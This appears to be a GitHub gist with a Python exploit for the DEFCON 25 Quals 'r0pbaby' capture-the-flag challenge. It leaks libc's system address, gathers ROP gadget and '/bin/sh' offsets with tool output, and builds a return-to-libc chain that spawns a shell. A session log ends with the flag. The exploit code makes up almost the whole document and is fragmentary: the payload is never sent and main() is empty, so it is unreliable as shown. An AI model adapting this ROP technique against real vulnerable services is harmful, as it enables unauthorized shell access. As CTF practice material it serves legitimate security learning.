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Last active August 29, 2015 14:21
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Save ytn86/2790c1c224825aa2c3a1 to your computer and use it in GitHub Desktop.
DEFCON 25 Quals r0pbaby
#!/usr/bin/env python3
import struct
import sys
import telnetlib
HOST = ''
PORT = 10436
% strings -tx|grep "/bin/sh"
17ccdb /bin/sh
% rp --rop=1 --unique|grep "pop rdi"
0x000fa47a: pop rdi ; call rax ; (1 found)
0x000831a8: pop rdi ; jmp rax ; (2 found)
0x00103fe2: pop rdi ; rep ret ; (2 found)
0x00022b1a: pop rdi ; ret ; (506 found)
0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
binsh_offset = 0x17ccdb
system_offset = 0x46640
popret_offset = 0x22b1a
def rp(addr):
addr = struct.pack('<Q', addr)
return addr
def get_addr(tn, name):
tn.write(b'2\n' + name.encode() + b'\n')
tn.read_until(name.encode() + b': ')
buf = tn.read_until(b'\n')
addr = int(buf.decode(), 16)
print(name + ' :{0}'.format(hex(addr)))
return addr
def exploit():
tn = telnetlib.Telnet(HOST, PORT)
system = get_addr(tn, 'system')
payload = b'deadbeef'
payload += rp(system - (system_offset - popret_offset))
payload += rp(system - (system_offset - binsh_offset))
payload += rp(system)
payload += b'\n'
def main():
if __name__ == '__main__':
% python
system :0x7f6066881640
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
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